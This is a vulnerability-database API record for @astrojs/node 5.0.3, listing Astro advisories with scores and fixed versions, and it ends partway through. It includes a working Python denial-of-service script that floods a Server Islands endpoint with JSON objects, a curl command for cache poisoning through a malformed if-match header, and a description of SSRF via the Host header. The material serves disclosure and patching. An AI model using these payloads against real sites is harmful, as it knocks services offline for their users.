Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/843101?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/843101?format=api", "purl": "pkg:npm/%40astrojs/node@5.0.3", "type": "npm", "namespace": "@astrojs", "name": "node", "version": "5.0.3", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "10.0.5", "latest_non_vulnerable_version": "10.0.5", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91508?format=api", "vulnerability_id": "VCID-c6g3-td4y-gbgj", "summary": "Astro: Memory exhaustion DoS due to missing request body size limit in Server Islands\n### Summary\n\nAstro's Server Islands POST handler buffers and parses the full request body as JSON without enforcing a size limit. Because `JSON.parse()` allocates a V8 heap object for every element in the input, a crafted payload of many small JSON objects achieves ~15x memory amplification (wire bytes to heap bytes), allowing a single unauthenticated request to exhaust the process heap and crash the server. The `/_server-islands/[name]` route is registered on all Astro SSR apps regardless of whether any component uses `server:defer`, and the body is parsed before the island name is validated, so any Astro SSR app with the Node standalone adapter is affected.\n\n### Details\n\nAstro automatically registers a Server Islands route at `/_server-islands/[name]` on all SSR apps, regardless of whether any component uses `server:defer`. The POST handler in `packages/astro/src/core/server-islands/endpoint.ts` buffers the entire request body into memory and parses it as JSON with no size or depth limit:\n\n```js\n// packages/astro/src/core/server-islands/endpoint.ts (lines 55-56)\nconst raw = await request.text(); // full body buffered into memory — no size limit\nconst data = JSON.parse(raw); // parsed into V8 object graph — no element count limit\n```\n\nThe request body is parsed before the island name is validated, so the attacker does not need to know any valid island name — `/_server-islands/anything` triggers the vulnerable code path. No authentication is required.\n\nAdditionally, `JSON.parse()` allocates a heap object for every array/object in the input, so a payload consisting of many empty JSON objects (e.g., `[{},{},{},...]`) achieves ~15x memory amplification (wire bytes to heap bytes). The entire object graph is held as a single live reference until parsing completes, preventing garbage collection. An 8.6 MB request is sufficient to crash a server with a 128 MB heap limit.\n\n### PoC\n\n**Environment:** Astro 5.18.0, `@astrojs/node` 9.5.4, Node.js 22 with `--max-old-space-size=128`.\n\nThe app does **not** use `server:defer` — this is a minimal SSR setup with no server island components. The route is still registered and exploitable.\n\n**Setup files:**\n\n`package.json`:\n```json\n{\n \"name\": \"poc-server-islands-dos\",\n \"scripts\": {\n \"build\": \"astro build\",\n \"start\": \"node --max-old-space-size=128 dist/server/entry.mjs\"\n },\n \"dependencies\": {\n \"astro\": \"5.18.0\",\n \"@astrojs/node\": \"9.5.4\"\n }\n}\n```\n\n`astro.config.mjs`:\n```js\nimport { defineConfig } from 'astro/config';\nimport node from '@astrojs/node';\n\nexport default defineConfig({\n output: 'server',\n adapter: node({ mode: 'standalone' }),\n});\n```\n\n`src/pages/index.astro`:\n```astro\n---\n---\n<html>\n<head><title>Astro App</title></head>\n<body>\n <h1>Hello</h1>\n <p>Just a plain SSR page. No server islands.</p>\n</body>\n</html>\n```\n\n`Dockerfile`:\n```dockerfile\nFROM node:22-slim\nWORKDIR /app\nCOPY package.json .\nRUN npm install\nCOPY . .\nRUN npm run build\nEXPOSE 4321\nCMD [\"node\", \"--max-old-space-size=128\", \"dist/server/entry.mjs\"]\n```\n\n`docker-compose.yml`:\n```yaml\nservices:\n astro:\n build: .\n ports:\n - \"4321:4321\"\n deploy:\n resources:\n limits:\n memory: 256m\n```\n\n**Reproduction:**\n\n```bash\n# Build and start\ndocker compose up -d\n\n# Verify server is running\ncurl http://localhost:4321/\n# => 200 OK\n```\n\n`crash.py`:\n```python\nimport requests\n\n# Any path under /_server-islands/ works — no valid island name needed\nTARGET = \"http://localhost:4321/_server-islands/x\"\n\n# 3M empty objects: each {} is ~3 bytes JSON but ~56-80 bytes as V8 object\n# 8.6 MB on wire → ~180+ MB heap allocation → exceeds 128 MB limit\nn = 3_000_000\npayload = '[' + ','.join(['{}'] * n) + ']'\nprint(f\"Payload: {len(payload) / (1024*1024):.1f} MB\")\n\ntry:\n r = requests.post(TARGET, data=payload,\n headers={\"Content-Type\": \"application/json\"}, timeout=30)\n print(f\"Status: {r.status_code}\")\nexcept requests.exceptions.ConnectionError:\n print(\"Server crashed (OOM killed)\")\n```\n\n```\n$ python crash.py\nPayload: 8.6 MB\nServer crashed (OOM killed)\n\n$ curl http://localhost:4321/\ncurl: (7) Failed to connect to localhost port 4321: Connection refused\n\n$ docker compose ps\nNAME IMAGE COMMAND SERVICE CREATED STATUS PORTS\n(empty — container was OOM killed)\n```\n\nThe server process is killed and does not recover. Repeated requests in a containerized environment with restart policies cause a persistent crash-restart loop.\n\n### Impact\n\nAny Astro SSR app with the Node standalone adapter is affected — the `/_server-islands/[name]` route is registered by default regardless of whether any component uses `server:defer`. Unauthenticated attackers can crash the server process with a single crafted HTTP request under 9 MB. In containerized environments with memory limits, repeated requests cause a persistent crash-restart loop, denying service to all users. The attack requires no authentication and no knowledge of valid island names — any value in the `[name]` parameter works because the body is parsed before the name is validated.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-29772", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07838", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07823", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.0785", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-29772" }, { "reference_url": "https://github.com/withastro/astro", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/withastro/astro" }, { "reference_url": "https://github.com/withastro/astro/commit/f9ee8685dd26e9afeba3b48d41ad6714f624b12f", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/withastro/astro/commit/f9ee8685dd26e9afeba3b48d41ad6714f624b12f" }, { "reference_url": "https://github.com/withastro/astro/releases/tag/@astrojs/node@10.0.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/withastro/astro/releases/tag/@astrojs/node@10.0.0" }, { "reference_url": "https://github.com/withastro/astro/security/advisories/GHSA-3rmj-9m5h-8fpv", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T20:16:28Z/" } ], "url": "https://github.com/withastro/astro/security/advisories/GHSA-3rmj-9m5h-8fpv" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29772", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29772" }, { "reference_url": "https://github.com/advisories/GHSA-3rmj-9m5h-8fpv", "reference_id": "GHSA-3rmj-9m5h-8fpv", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3rmj-9m5h-8fpv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/113791?format=api", "purl": "pkg:npm/%40astrojs/node@10.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-jt7q-nwep-wbfb" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@10.0.0" } ], "aliases": [ "CVE-2026-29772", "GHSA-3rmj-9m5h-8fpv" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-c6g3-td4y-gbgj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50307?format=api", "vulnerability_id": "VCID-ecmk-efnj-nbfq", "summary": "Astro has Full-Read SSRF in error rendering via Host: header injection\nServer-Side Rendered pages that return an error with a prerendered custom error page (eg. `404.astro` or `500.astro`) are vulnerable to SSRF. If the `Host:` header is changed to an attacker's server, it will be fetched on `/500.html` and they can redirect this to any internal URL to read the response body through the first request.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25545", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.05142", "scoring_system": "epss", "scoring_elements": "0.90053", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.05142", "scoring_system": "epss", "scoring_elements": "0.9005", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.05142", "scoring_system": "epss", "scoring_elements": "0.90052", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25545" }, { "reference_url": "https://docs.astro.build/en/basics/astro-pages/#custom-500-error-page", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://docs.astro.build/en/basics/astro-pages/#custom-500-error-page" }, { "reference_url": "https://github.com/withastro/astro", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/withastro/astro" }, { "reference_url": "https://github.com/withastro/astro/commit/e01e98b063e90d274c42130ec2a60cc0966622c9", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T14:50:52Z/" } ], "url": "https://github.com/withastro/astro/commit/e01e98b063e90d274c42130ec2a60cc0966622c9" }, { "reference_url": "https://github.com/withastro/astro/releases/tag/%40astrojs%2Fnode%409.5.4", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T14:50:52Z/" } ], "url": "https://github.com/withastro/astro/releases/tag/%40astrojs%2Fnode%409.5.4" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25545", "reference_id": "CVE-2026-25545", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25545" }, { "reference_url": "https://github.com/advisories/GHSA-qq67-mvv5-fw3g", "reference_id": "GHSA-qq67-mvv5-fw3g", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qq67-mvv5-fw3g" }, { "reference_url": "https://github.com/withastro/astro/security/advisories/GHSA-qq67-mvv5-fw3g", "reference_id": "GHSA-qq67-mvv5-fw3g", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T14:50:52Z/" } ], "url": "https://github.com/withastro/astro/security/advisories/GHSA-qq67-mvv5-fw3g" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/74205?format=api", "purl": "pkg:npm/%40astrojs/node@9.5.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-c6g3-td4y-gbgj" }, { "vulnerability": "VCID-jt7q-nwep-wbfb" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.5.4" } ], "aliases": [ "CVE-2026-25545", "GHSA-qq67-mvv5-fw3g" ], "risk_score": 3.9, "exploitability": "0.5", "weighted_severity": "7.7", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ecmk-efnj-nbfq" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89280?format=api", "vulnerability_id": "VCID-jt7q-nwep-wbfb", "summary": "Astro: Cache Poisoning due to incorrect error handling when if-match header is malformed\n### Summary\nRequesting a static JS/CSS resource from the `_astro` path with an incorrect or malformed `if-match` header returns a `500` error with a one-year cache lifetime instead of `412` in some cases. As a result, all subsequent requests to that file — regardless of the `if-match` header — will be served a 5xx error instead of the file until the cache expires.\n\nSending an incorrect or malformed `if-match` header should always return a `412` error without any cache headers, which is not the current behavior.\n\n### Affected Versions\n- `astro@5.14.1`\n- `@astrojs/node@9.4.4`\n\n### Proof of Concept\n\nRun the following command:\n\n```\ncurl -s -o /dev/null -D - <host location>/_astro/_slug_.UTbyeVfw.css -H \"if-match: xxx\"\n```\n\nIf a 5xx error is not returned, inspect the resources via the browser's web inspector and select another CSS/JS file to request until a 5xx error is returned. The behavior generally defaults to a 5xx response. Note that all static files are immutable, so the cache must be purged or disabled to reproduce reliably.\n\nA response similar to the following is expected from CloudFront:\n\n```\nHTTP/2 500 \ncontent-type: text/html\ncontent-length: 166541\ndate: Thu, 09 Apr 2026 12:53:08 GMT\nlast-modified: Wed, 21 Jan 2026 13:40:08 GMT\netag: \"a68349e96c2faf8861c330aeb548441a\"\nx-amz-server-side-encryption: AES256\naccept-ranges: bytes\nserver: AmazonS3\nx-cache: Error from cloudfront\nvia: 1.1 3591be88662e5675a9dc1cc4e0a9c392.cloudfront.net (CloudFront)\nx-amz-cf-pop: ZRH55-P2\nx-amz-cf-id: Rg--RIYCKcA55GZqZXdvu-VTvpxBFFVzV4LBIcKq5pB_hktcrhYbKg==\n```\n\nThe above is not the real server output but the AWS error response triggered when the pods return a 5xx. Below is the output of the same `curl` command issued directly against a pod in Kubernetes:\n\n```\n❯ curl -s -o /dev/null -D - -H \"Host: tagesanzeiger.ch\" 127.0.0.1:3333/_astro/InstallPrompt.astro_astro_type_script_index_0_lang.C0M4llHG.js -H \"if-match: xxx\"\n\nHTTP/1.1 500 Internal Server Error\nCache-Control: public, max-age=31536000, immutable\nAccept-Ranges: bytes\nLast-Modified: Tue, 07 Apr 2026 07:08:03 GMT\nETag: W/\"560-19d66c50c38\"\nContent-Type: text/javascript; charset=utf-8\nDate: Tue, 07 Apr 2026 08:23:54 GMT\nConnection: keep-alive\nKeep-Alive: timeout=5\nTransfer-Encoding: chunked\n```\n\nThis demonstrates that the pod itself returns a `5xx` error instead of `412`. In addition, the response includes a `Cache-Control: public, max-age=31536000, immutable` header.\n\nBecause the testing setup configures `if-match` as part of the cache key, the exploit no longer affects the production application. Prior to that change, the CDN Point of Presence would become cache-poisoned, and any client visiting the affected pages without cached files through the same PoP would receive broken pages. This was reproduced by creating test URLs and visiting them in a browser only after triggering the exploit. The exploited resources returned `5xx` errors instead of the original CSS/JS content, breaking the application.\n\n### Details\nThe findings were analyzed with an LLM, which identified the following file as the likely source: [serve-static.ts](https://github.com/withastro/astro/blob/main/packages/integrations/node/src/serve-static.ts)\n\n```js\n// Lines 129-153\n\nlet forwardError = false;\n\nstream.on('error', (err) => {\n if (forwardError) {\n console.error(err.toString());\n res.writeHead(500);\n res.end('Internal server error');\n return;\n }\n // File not found, forward to the SSR handler\n ssr();\n});\nstream.on('headers', (_res: ServerResponse) => {\n // assets in dist/_astro are hashed and should get the immutable header\n if (normalizedPathname.startsWith(`/${app.manifest.assetsDir}/`)) {\n // This is the \"far future\" cache header, used for static files whose name includes their digest hash.\n // 1 year (31,536,000 seconds) is convention.\n // Taken from https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Cache-Control#immutable\n _res.setHeader('Cache-Control', 'public, max-age=31536000, immutable');\n }\n});\nstream.on('file', () => {\n forwardError = true;\n});\nstream.pipe(res);\n```\n\nLLM analysis:\n\n> `send` handles conditional request headers such as `If-Match` internally. When a file is found but the precondition fails (ETag mismatch), `send`:\n>\n> 1. Emits `file` (the file exists) → `forwardError = true`\n> 2. Emits `headers` → `Cache-Control: public, max-age=31536000, immutable` is set on `res`\n> 3. Emits `error` with a `PreconditionFailedError` (status 412)\n>\n> However, the error handler does not inspect the error's status code:\n>\n> ```js\n> stream.on('error', (err) => {\n> if (forwardError) {\n> console.error(err.toString());\n> res.writeHead(500); // ← always 500, regardless of the actual error\n> res.end('Internal server error');\n> return;\n> }\n> ssr();\n> });\n> ```\n>\n> Because `Cache-Control` was already set during the `headers` event, the response is sent as:\n>\n> ```\n> HTTP/1.1 500 Internal Server Error\n> Cache-Control: public, max-age=31536000, immutable\n> ```\n\n\n### Impact\n**Cache Poisoning** — An attacker can force edge servers to cache an error page instead of the actual content, rendering one or more assets unavailable to legitimate users until the cache expires.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41322", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17722", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17756", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17763", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41322" }, { "reference_url": "https://github.com/withastro/astro", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/withastro/astro" }, { "reference_url": "https://github.com/withastro/astro/security/advisories/GHSA-c57f-mm3j-27q9", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:48:09Z/" } ], "url": "https://github.com/withastro/astro/security/advisories/GHSA-c57f-mm3j-27q9" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41322", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41322" }, { "reference_url": "https://github.com/advisories/GHSA-c57f-mm3j-27q9", "reference_id": "GHSA-c57f-mm3j-27q9", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-c57f-mm3j-27q9" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110333?format=api", "purl": "pkg:npm/%40astrojs/node@10.0.5", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@10.0.5" } ], "aliases": [ "CVE-2026-41322", "GHSA-c57f-mm3j-27q9" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jt7q-nwep-wbfb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/57869?format=api", "vulnerability_id": "VCID-mhk4-vf4t-47g7", "summary": "@astrojs/node's trailing slash handling causes open redirect issue\nFollowing https://github.com/withastro/astro/security/advisories/GHSA-cq8c-xv66-36gw, there's still an Open Redirect vulnerability in a subset of Astro deployment scenarios.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-55207", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.1321", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.13174", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.13213", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-55207" }, { "reference_url": "https://github.com/withastro/astro", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/withastro/astro" }, { "reference_url": "https://github.com/withastro/astro/commit/5fc3c599cacb0172cc7d8e1202a5f2e8685d7ef2", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-15T19:10:24Z/" } ], "url": "https://github.com/withastro/astro/commit/5fc3c599cacb0172cc7d8e1202a5f2e8685d7ef2" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55207", "reference_id": "CVE-2025-55207", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55207" }, { "reference_url": "https://github.com/advisories/GHSA-9x9c-ghc5-jhw9", "reference_id": "GHSA-9x9c-ghc5-jhw9", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-9x9c-ghc5-jhw9" }, { "reference_url": "https://github.com/withastro/astro/security/advisories/GHSA-9x9c-ghc5-jhw9", "reference_id": "GHSA-9x9c-ghc5-jhw9", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-15T19:10:24Z/" } ], "url": "https://github.com/withastro/astro/security/advisories/GHSA-9x9c-ghc5-jhw9" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/86109?format=api", "purl": "pkg:npm/%40astrojs/node@9.4.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-b47j-p5et-rfem" }, { "vulnerability": "VCID-c6g3-td4y-gbgj" }, { "vulnerability": "VCID-ecmk-efnj-nbfq" }, { "vulnerability": "VCID-jt7q-nwep-wbfb" }, { "vulnerability": "VCID-mu7k-psez-uudf" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.4.1" } ], "aliases": [ "CVE-2025-55207", "GHSA-9x9c-ghc5-jhw9" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mhk4-vf4t-47g7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/57897?format=api", "vulnerability_id": "VCID-qcs7-nt67-7qe5", "summary": "Astro allows unauthorized third-party images in _image endpoint\nIn affected versions of `astro`, the image optimization endpoint in projects deployed with on-demand rendering allows images from unauthorized third-party domains to be served.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-55303", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.32524", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.32562", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.32594", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-55303" }, { "reference_url": "https://github.com/withastro/astro", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "6.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/withastro/astro" }, { "reference_url": "https://github.com/withastro/astro/commit/4d16de7f95db5d1ec1ce88610d2a95e606e83820", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "6.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-08-19T20:49:42Z/" } ], "url": "https://github.com/withastro/astro/commit/4d16de7f95db5d1ec1ce88610d2a95e606e83820" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55303", "reference_id": "CVE-2025-55303", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "6.4", "scoring_system": "cvssv4", "scoring_elements": 